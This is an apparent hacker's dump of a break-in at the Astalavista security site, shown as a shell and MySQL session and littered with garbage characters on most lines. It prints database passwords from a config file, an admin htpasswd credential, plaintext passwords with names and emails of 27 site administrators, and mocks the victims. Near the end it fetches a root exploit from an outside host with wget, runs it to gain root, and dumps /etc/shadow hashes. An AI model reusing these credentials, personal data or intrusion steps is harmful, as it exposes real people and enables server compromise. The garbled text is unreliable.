0 s4 {# I; Z; `0 v! Y+ N( _! vdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
( v: A8 z' t. z' k( Ddrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0075 q d: j: u& k" a& j4 [+ u. a
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql8 i) H4 U# d5 f$ q1 t: b
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
5 l% B9 ^" m; C4 rdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend8 Z, M) m: N0 T( I" ~5 B' F2 F$ K
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
6 s5 k# a' T. p5 f: t; t0 K-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
; Q- b# {/ ?; ydrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
$ b0 {5 k8 p) g8 t6 c2 F) Sdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
* S/ ?9 g6 f$ u- ]* Z) ^drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
, T( x! f* t# N- Z-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php) H/ B) T* a& W- [8 j
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
. G% m: m Y! z' x3 X3 ^9 y4 Z; s: Hdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed$ S, U% h: h' n. g* t
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
& h7 A) P" R/ Z; x-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
. V& c+ K1 ?2 Z. o9 m-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess# y0 e4 h& v W/ [- \9 v
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
3 w; t( `3 b7 Q! s( {5 i9 r3 h-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html& ^6 F- n, ^$ T
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php' E4 E! k7 H- J1 L
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
; o2 e/ D" s: F. ]! G8 _1 e8 k-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf( ?1 p5 L' ?6 p- {% I, |
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
; p+ o6 Q+ s; S. F: F' |drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
, I5 e j; I$ L+ Z/ i& [drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
/ g7 m, a1 D; u1 j" X0 _0 Sdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
2 i# g0 H u. w- v5 kdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
) G3 t/ x# P# |- {0 rdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata+ y! I5 V. R/ e/ i% \
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new$ H' `* E. Q* q5 l( l$ Y( X
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
: f! C* K( T/ t8 F/ qdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
. e* B' ?# a' O- }% @7 r-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
% E& x. v7 U' U/ `9 udrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss" I$ V5 @! s+ g& V# f0 ?5 l
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources; u( r* L; f* s+ p4 X
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
! [4 w, I5 m7 }, a: s+ o3 Jdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes0 q( A# `5 F( R" [) i" u1 ~# x
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src% ]' x8 g3 H& d, D& N
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
2 d( n# b/ x1 W2 t$ s4 H& Udrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
1 k; s' e* ]0 O7 Jdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old' a+ k$ I( ^2 N; X- O) E' O
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
0 c7 v! O- ^+ j/ D+ C F5 e. edrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki5 X. ~/ `: n+ Z) Y: U) b6 B- D
* r5 N' N2 ?& ~: Msh-3.2$ head -20 index.php
4 Z8 X. J% ^; v; D0 O<?PHP
& G4 x# N/ d$ w5 W/**
% L0 H- ]1 ~( O4 N' @. h7 k3 v* Mainfile (external) for astalavistaNET v2.0* X% p) \/ O1 t. W: U
*# v. p; `* U% r9 j! l
* @copyright Astalavista IT Engineering GmbH0 V I/ _. B: O1 f
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>, X! \$ g: Q/ C
* @version 1.0
. ^* W! ]: I" H$ P4 M*/
% E! B1 |5 p- ?4 K6 ]: o
5 o9 k! [/ |. e& d if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
; |' `$ u( J* j $dontStartSession = false;
/ H O1 k) L4 ^ } else {
. ~" W9 H4 E3 u% t0 z $dontStartSession = true;' ~$ W! U6 B% [& ^8 A
}6 o8 |5 r5 S# I
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);0 T3 ?! g8 G( W* C O
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
) I5 k7 _6 n+ t5 Q* q- s require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);- m8 a3 r: b# y1 Y. I) N# M O
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
% O ^7 j* P! {4 n) n' J) N" k% k* U: s7 I* b- ]# y
sh-3.2$ cd config
4 y5 X' n: p+ `+ B9 Psh-3.2$ ls -la4 }$ q, w/ H5 R$ }9 \+ V
total 32* f/ o+ G8 Z$ ?% ~/ ~
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .8 E! u5 C3 k9 G* b' v
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..! j/ `( P+ O, U: g4 S
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
" m" H* X% U+ _6 v* @-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php6 I2 {+ J9 r9 i1 q7 t( @7 ~2 B, t
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
$ Q/ _% Q4 s, \* f4 a$ K" z-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php: |/ s, a. P6 P4 I& s* Z- t
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php- Q: k( F/ v, k" v; w+ T5 M* P! d- I
3 V2 W7 ]# d! z% r& `9 T
sh-3.2$ cat com.conf.php
! H: u% J+ u3 o* N. s[snip]$ f, ?& Y; ?5 |: L, B' q+ _
//member-database" f5 F) q2 T2 Q# M) \3 Q- u
$_CONFIG['db_mem_server'] = ‘localhost’;$ s8 [+ J7 E& K/ C
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
* k* {1 c& O$ y: [$_CONFIG['db_mem_user'] = ‘astanet_db’;" f" q+ o" M; c+ H0 T$ M
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
) L5 u' u" ^3 C: H+ L F7 U0 N0 o3 c5 f! U$_CONFIG['db_mem_debug'] = false; //true or false
: n$ D+ C; f$ D$ @6 w//ads-database% O- N% s6 z( G3 v: S* ~$ s' n5 S
$_CONFIG['db_ads_server'] = ‘localhost’;* U+ U2 v2 S/ ?
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
! E/ @+ F0 `5 d6 w$_CONFIG['db_ads_user'] = ‘astanet_db’;" z A! W3 y: v7 {
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
" L0 N! b5 |1 f0 s K! c$_CONFIG['db_ads_debug'] = false; //true or false
3 t9 T1 u9 m5 q) p* `//rainbow-database7 c! p% F2 U- W7 j
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;2 ^3 p: N& x, ?* K7 c/ i
$_CONFIG['db_rainbow_database'] = ‘rainbow’;7 f0 u3 O& X& U: h2 B( ^5 _
$_CONFIG['db_rainbow_user'] = ‘dinu’;
$ s M; x+ `! H9 ^. V5 C- ^$_CONFIG['db_rainbow_password'] = ‘dinudinu’;( D# S: S( @3 e" |' q
$_CONFIG['db_rainbow_debug'] = false; //true or false3 A% e7 L0 ], n8 G7 b3 n3 a
//mailing lists database
4 L' u# p, g4 [- S$_CONFIG['db_mailing_lists_server'] = ‘localhost’;7 v7 X- l9 A) H
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;) g4 ^$ S5 F: c( D
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
, J2 f, E: K' m- w5 M$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
3 Q4 K. Y, f+ A: e* ^, J$_CONFIG['db_mailing_lists_debug'] = false; //true or false& W7 ~& y3 T% n
//paypal
* a4 M' N/ s+ @# G. ]1 R' `$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;2 H, a+ e V# E1 O3 D& I
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;, P+ K$ z1 K& ^5 F# q
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
! r+ p9 g, q Z: Q) K$_CONFIG['sub_pp_noship'] = ‘1′;
1 x, ?) `" O1 q+ |$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
! w# o3 H6 r0 t[snip]
$ b, ]5 Y I# _" N5 q7 T* I2 G/ Y* F$ x7 [& x+ v
sh-3.2$ cd ..6 o/ R5 K, D H
sh-3.2$ cd member
8 v( p( K' J" s1 Dsh-3.2$ ls -la
, q; M7 a/ I$ D8 f! V& Ototal 204 p4 i2 q" g8 _7 B/ M. l. ]
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .$ S- [2 J; v$ {* Z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..( O- h. ^- G* x+ N; a
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess' s" | D# i0 t; Z( `! B
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php7 ~6 G i( X! Z; j. K& v
sh-3.2$ cat .htaccess
. Y# ]3 P9 s8 VSecFilterEngine off' p6 E P7 F" e8 Q- f3 ~8 ?2 T
$ b+ p3 q; i* W% r" |. B/ `: Bsh-3.2$ cd ..8 v2 ^8 K* |' R/ E$ X1 b
sh-3.2$ cd cron
1 Z7 b" f; {! X0 [( \' Xsh-3.2$ ls -la5 v9 n6 m+ Q8 g, ~
total 1686 V; N1 b( J4 W) O T; ~. n7 h
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
) e0 u( n `% v# wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..7 u, H# g2 q# @' _! x y
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php: V, B5 U$ m2 K O" z4 p1 K# p
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
" B3 L, ]( Z7 c3 b$ M2 d+ S-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
4 j+ A: G1 }, \9 v: d# S-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
! p1 q8 z; _! T/ w( P D' ~-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php4 z3 n* r$ V& \* Q& u# H
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php, [3 @# s; \. R
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
( c8 }# @9 R) G' _* d. y-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
$ `1 E0 @/ k8 H/ ^/ v: h-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh! ~% R& \) t* P; Z
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php) p9 `5 ?. T0 F9 R
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
8 u- `9 m& D9 Q9 B" @' m-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
/ R3 ~3 w2 K& J- `& w2 n-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
5 u1 V, C- S8 D) q-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
+ f1 J8 u4 r* H/ y/ j. q4 L R9 t-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
6 Q6 K2 m' r+ S7 I( I S7 F-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
) W' f) F. M) A" n3 S-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php6 C9 A/ [% ` \' l+ R" t
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php0 d1 U' R C# Z e( Z- Z$ E7 J6 X
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
& Q8 D% \! c# ?-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php3 b/ V% F3 p" {( P% T/ \( z
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php7 j! x/ y1 V" v& j8 v0 `
- Q% |! D/ H. W( W- {: B$ Y% i2 A
sh-3.2$ cd ..
4 b- |9 ?1 }8 C4 a& m8 f8 z# Vsh-3.2$ cd _007
" L1 T0 f2 f1 C$ }+ ssh-3.2$ ls -la# h+ @' ], ~9 q3 g0 F
total 24
9 Y- |" t7 L- }drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .* c- @: w1 p. P2 S
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% N& I# P) f: g. f- ~
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess$ U/ e3 m' S; G( O9 M! c
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php: [: i2 c4 }; ~% F' k
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php" k, W4 [7 w I& M7 H
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap& J. J8 h! R) h: P( T: ~' v" o
+ a. g; x8 \4 ]. ?" S" Ysh-3.2$ cat .htaccess
, M- z* j. y6 b8 nauthType Basic5 N7 g! l. \. z
authName Admin
( e! T2 A. B- ~- SauthUserFile /home/astanet/auth/.htadm_pwd
8 X* g g& c; U1 S- M% Prequire valid-user# D* g% r: {4 v3 C9 d! v& R4 }
; p: P, y$ J5 m" g- P4 bsh-3.2$ cat /home/astanet/auth/.htadm_pwd: b# i9 \: E3 P9 e! g
admin2net:CR0bl65MwhfT
, F: o3 T- J& ?/ w1 Q, v/ h$ T& R" {" _" ^/ H# v2 T
sh-3.2$ mysql -u astanet_db -p
( b" u+ q4 _) o: ?* Y4 K4 N+ ZEnter password:" \! F# d( |2 I" U) e5 @6 }! s
Welcome to the MySQL monitor. Commands end with ; or \g.
. s# H" S: C/ w/ H9 T% P) |Your MySQL connection id is 2751538 L; d1 L: n0 B, x
Server version: 5.0.45-community-log MySQL Community Edition (GPL); F3 E1 ^, A8 L& H: l& d2 {/ \
; G( u6 z7 b* e4 [* F1 HType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) F# B5 S7 Q7 j0 y+ D. f" ?) q! I9 g5 O' m* e
mysql> show databases;* \; l, j' Z A4 N" q
+———————–+
- \* f5 I f1 B; J, R+ v| Database |: X4 J8 Y- @* `% t3 e( Z5 W2 Z
+———————–+7 ~& j. O* J4 S. B
| information_schema |* q( ?0 Z2 ]( N
| astanet_ads |
6 V$ |2 x6 `3 n3 w4 [/ \| astanet_mailing_lists |
" m/ X5 L1 D8 Q. S! J| astanet_mediawiki |8 K3 J* v+ q" b; z7 I0 k
| astanet_membersystem |
( ^( M0 \. d3 V0 J' Y2 o| test |
& }6 r: N, [3 h* K# p" M+———————–+
5 ^& `2 P1 x* q. I* ?: H; ~& u6 rows in set (0.00 sec)
; s. O. H9 d" {7 z% {4 z- \1 H% }; T) B t! ?( i# n# I
mysql> use astanet_membersystem3 r; W) c& e- g" \# l& F" Q
Database changed
, _; b) f4 e( v- `8 Rmysql> show tables;
$ v- B" q3 Q1 p0 n6 j+———————————–+
- C" V' S3 t3 X+ Q% D| Tables_in_astanet_membersystem |
5 C6 r/ u& d3 _4 F! [2 G8 Q# a+———————————–+2 \/ b+ ?# v: g9 ~ M# v
| blacklist_categories |
% @8 D# g8 l, ~# }* i* d| blacklist_content |' [; C) B0 b3 E
| blacklist_levels |
: [ ~$ n/ n9 |) e( S. U2 [! r7 V| blacklist_mcset |
* u/ c4 s9 [& \/ G5 q" [8 e* l| dir_categories |: ~" V7 ]/ r: q/ U9 n
| dir_comments |7 L1 ~1 D% ?' `
| dir_links |3 j$ N/ W2 S, L2 D) @1 b' m/ t
| dir_temp |
) g4 s( Y; ?* ~- p| dir_votes |* O- [: y: a+ l# H& e2 d' i
| documents | r( d) I8 E8 m* h2 M
| documents_categories |% u5 m2 [7 Q6 q3 K# A8 L
| email_content |6 o" L' h5 n$ f% f
| email_settings |7 z8 l# w3 k! L+ n7 R& F. Y6 X. ^
| exploits |
* o% \& u4 O2 o9 n5 B8 `, [- C| exploits_categories |3 `8 Q& g4 d. L L5 B0 B8 }
| exploittree_categories |6 L o! f% M% }9 H* m* Z [
| exploittree_exploits |
' z2 U: }5 S: y' O: ~: N. v| home_values |! F9 w! S: W5 @
| iso_countries |
0 O2 z: n9 b3 k6 G2 u' I' h, c| links_categories |
' W$ L" F9 y8 B. ^: u$ H; j+ p* u# f| links_records |7 H! ^; o1 Q! b8 U3 {: o# e
| links_unauth |" A/ Q, m1 Y4 C. w# C2 c/ A
| links_votes |7 \2 J( a$ [3 h8 W
| log |* r; R6 V* ^! {- O0 W! b& B, s
| news_categories |
$ M6 I( N+ b& `% v0 `1 k| news_comments |$ C6 _% ~: M9 M O- e
| news_emoticons |8 f: s0 e; b! w5 C M
| news_latest |4 a' t, S2 d, ~; z+ c
| news_messages |
/ {7 B) v1 v9 k6 x- T| news_statistics |% H* F# G$ x: i4 Z/ X
| news_votes |
+ o0 @) q0 ]6 ?) e4 p/ p0 O3 E! r| prices_content |6 ]2 z' `, K/ H7 L
| prices_offers |2 B$ a% s+ J: z
| rss_settings |1 Z4 }% v, |1 [% Z
| sessions |% L2 i' |( d2 g- ?! F; ]6 C
| stats_signups |
2 @. f/ O' N" ~, [% p! {- ?, J| u2u2 |; u, L* l8 Q. Q) J
| u2u_contact |% n" N1 V3 K q& I! K& G
| u2u_settings |7 M* ]4 ], C: P: w( n/ p! e5 O/ E
| user_keywords_selected_categories |' Y& B- h1 {2 h
| users |7 r8 g3 M9 C, `4 F
| users_ipn_test |
8 D* o% G a/ C6 a: u+ n0 X; l| users_keyword_values |
; `4 b3 }! J7 t" G7 N| users_profile |+ d& r% z% O: U' t
| users_temp |
, b1 W# ]' @5 c7 w| users_upgrade |. U' ~- N9 _( i, ^1 @( I* N4 K
+———————————–+( U J6 x/ ]; w' o
46 rows in set (0.00 sec)
. l# L Y$ }4 |1 C5 q) N; G0 X6 d; ]
* N1 G# v3 b5 N- w6 \; v9 bmysql> describe users;
+ _+ B+ i, o5 }' c) I f1 m8 |/ N+————————–+————————————–+——+—–+———————+—————-+
: `7 X- g2 d5 ]: ^2 z1 n| Field | Type | Null | Key | Default | Extra |
% W' W6 q$ e3 y8 n' A% W+————————–+————————————–+——+—–+———————+—————-+
5 L$ E2 E0 n, E, }/ o0 Z9 ?| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
5 f. v6 \: C. R5 g8 y8 o. U% p| user | varchar(50) | NO | | | |( |# W! W, R+ x4 W* g3 P3 j/ P) K
| nickname | varchar(30) | NO | MUL | anonymous | |
9 U- y$ U. [5 _4 B6 x+ p4 r| password | varchar(30) | NO | | | |
9 e7 L+ U6 l. c9 O$ q! j| userlevel | tinyint(3) | YES | MUL | NULL | |2 S1 C! Y% K8 }; S# p; p
| exp | int(8) unsigned | NO | | 0 | |
; Q% f4 @4 o; o| email | varchar(50) | NO | | | |
) S0 T+ |. F: P| ip | varchar(15) | NO | | 0 | |
" S, e9 D$ Z8 V" k| proxy | set(’0′,’1′) | NO | | 0 | |7 y: W F% Z4 I2 N) O8 T# x
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
+ I8 [+ Z6 d/ J0 v0 |$ [| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
) r/ O+ W( i1 G" b+ C| anz_in | tinyint(1) | NO | | -1 | |
6 |2 O8 _! ?6 c ~( e1 Q/ Z* o, f| status | tinyint(1) unsigned | NO | | 0 | |
' y7 r" G. q* S2 T/ n| checked | set(’0′,’1′,’2′) | NO | | 0 | |( ]+ _2 @2 t0 b1 _' s2 |" @3 g% d! s
| freemember | set(’0′,’1′) | NO | | 0 | |5 g4 q, R$ R$ t: U
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
. m+ [/ j) x ?) g| lang | tinytext | NO | | | |0 _3 f1 i1 Z" Q0 c0 O4 ?
| adid | smallint(6) | NO | | 0 | |% a; d7 n6 b8 @2 Z. Q& s# |
| pp_txn_id | varchar(255) | YES | | NULL | |- ~# l- g9 K' C) j9 `
| cnb_transaction_id | varchar(255) | YES | | NULL | |
9 q; x* d d; O9 b" d* X' `| cnb_order_id | varchar(255) | YES | | NULL | |
4 b* a& ]7 a7 m K9 m8 `4 U5 P1 I| cnb_user_id | int(11) | YES | | 0 | |' z, O( x- `. O
+————————–+————————————–+——+—–+———————+—————-+
" ?' J# I) j; ^: I: Y22 rows in set (0.01 sec)
, J' W6 p- y/ T$ ^# E w' C" `
! Q# [/ v% x% _0 m( C# Dmysql> select count(*) as skids from users;; m% t6 ?- {; \1 n6 }) V" }
+——-+
; Z. O: E4 z9 m! K5 T) j. m| skids |
; h4 Z- g4 } }' f3 U7 T7 s+——-+2 f: `: R- Q( D- z
| 25199 |3 Q7 Y: Q! s- r, \7 p1 E
+——-+0 i4 Z6 C" V# ^! S: c
1 row in set (0.00 sec)6 n, w! P% a7 t+ ?
2 n" U0 k7 D; \, \0 r( i
mysql> select user,nickname,password,email from users where userlevel = 1;; c% T y% j4 ~$ t
+————————–+———————-+——————+———————————–+
% _4 b( Q) P) g, k% d: D| user | nickname | password | email |
% ]' R5 X/ L4 _) b. z" k+————————–+———————-+——————+———————————–+$ k; g7 Q* {1 D) p" F
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |4 m) a8 Z# q* h @0 F
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
9 |& w, i0 j# ^: \| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
5 t) d3 S2 C8 F, l| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |/ }6 G: O. ]6 v* B( d# W, R
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |( n, ?! b8 U/ b! z& k9 r6 @2 r3 X" N
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
$ o, k* F; N% {& s) g| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
' I2 @8 s% |( x, w| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
8 g' J$ r% _ Y| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
7 W2 m/ r! R4 v# r7 }# W& g| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |1 v; Q. c8 o ?$ C3 o1 d
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |+ M* q; W' N! f+ J2 p+ E
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
& v3 L# s$ ^7 R+ A6 N) b| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
3 ^) i7 X" G/ T; [| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
7 H' c8 \) i7 Q# S' v( R| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
6 |% ?' [- |$ U% [0 a" S| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |6 H! i$ P1 Z+ M _
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |, _& p! {) \! A$ L
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
2 k' e. y3 H+ d5 v. k| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |$ x. g4 T, c9 _
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |2 `/ ]# F" W# m e2 ~
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |1 @ _' H: H2 d, b
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
: q5 p/ ]0 Q. U8 s! c a z& j| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
! ~ l# A- _2 k+ G0 A| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |, d5 y0 h# e8 Q/ o, ~+ O
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
1 ]4 k9 O4 C% k6 m| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
1 w/ v4 n. T2 r. Y( B% ^| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
0 k9 ~3 S0 z% S+————————–+———————-+——————+———————————–+1 q" N8 D5 J B! X
27 rows in set (0.00 sec)
Y' b3 Z1 d& i1 D; u' _, i
" J( J4 y- r+ ?mysql> exit;& c3 B) V. `1 V9 c! h; i" ^
Bye6 B7 o# E6 H& C& X
- e! R) U& M+ z( j
[~] plaintext passwords? yes,
7 K2 Q/ A x3 W+ ]* XThose so called “security professionals” who charge you $6.66 / month to
! ^( J! T" a" A' ^/ ?register at their hack-proof portal, save your passwords in plaintext…
7 v% X8 S0 h2 [+ }5 I* Ebrilliant!3 s+ Z+ j4 R0 V7 O- g2 _
; V0 P8 b9 t4 p: M: @
[~] This been fun but we want more.
' a0 [5 ?: e+ J% V* [( D T/ Q6 T T' B6 S/ I# |* l. x( o
sh-3.2$ uname -a
8 r$ H. p1 b; ~0 Q2 ]6 s7 aLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux' ]; ^' p3 T& [2 f" C4 |) W# U
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]' d: ^' h9 H3 f+ p: S
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
: z5 A" D/ Z; u# Q2 p+ j9 LResolving anti.sec.labs… 13.33.33.37
7 p" U8 `1 o* l) H; X5 yConnecting to anti.sec.labs|13.33.33.37|:80… connected.
' \9 J- A5 O, }7 R- G# ~) J; {6 _HTTP request sent, awaiting response… 200 OK
- T/ s. U* ^$ E; S2 l8 jLength: 18200 (18K) [text/plain]
1 y m2 F4 o4 @+ i' a+ |; v: @. USaving to: `g0troot’
* x" z7 s" c9 ~7 ]" {8 \! q
- z4 t0 l8 B, P6 s100%[=========================================================================================================================================>] 18,200 58.6K/s in
. O; m! `9 e! f' ~, L! A& t/ ?0.3s6 T3 W4 D5 X! `) v: N5 A
/ s3 X- a$ f/ y$ Z18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]9 S$ c! c- [/ W/ [
: h, Y. t9 M {2 B
sh-3.2$ ./g0troot -i x86_64! A& v$ n: P3 i! v
[+] g0troot - anti.sec.labs
6 U) b! b8 ?; L[+] Target: 2.6.18-128.1.10.el5$ n* ~$ J. Y |/ S
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
# H2 R; p$ W/ o3 Q; e/ p2 o, s" x, U* D- q: o/ P
[+] r00tr00t
$ X& U5 U, c3 m$ V& d( J: L1 E( x[~] Executing shell…' t" u. Q8 C! B" |2 D, c
/ O4 w5 p7 G; ]1 q
sh-3.2# id
7 f8 |9 J, a+ I* duid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)5 T) N. ]: K9 Z8 R8 Q
# D f+ d3 ?: U% @: ush-3.2# cat /etc/shadow
; w7 H4 X2 y9 i0 proot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
& x3 p5 H' }& B i3 O* W! U[snip]; L. D/ ?; e/ l8 z) H" M
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::) P" A& W% ~0 X: q1 i
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
7 I1 s0 J) u1 y5 R( lcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
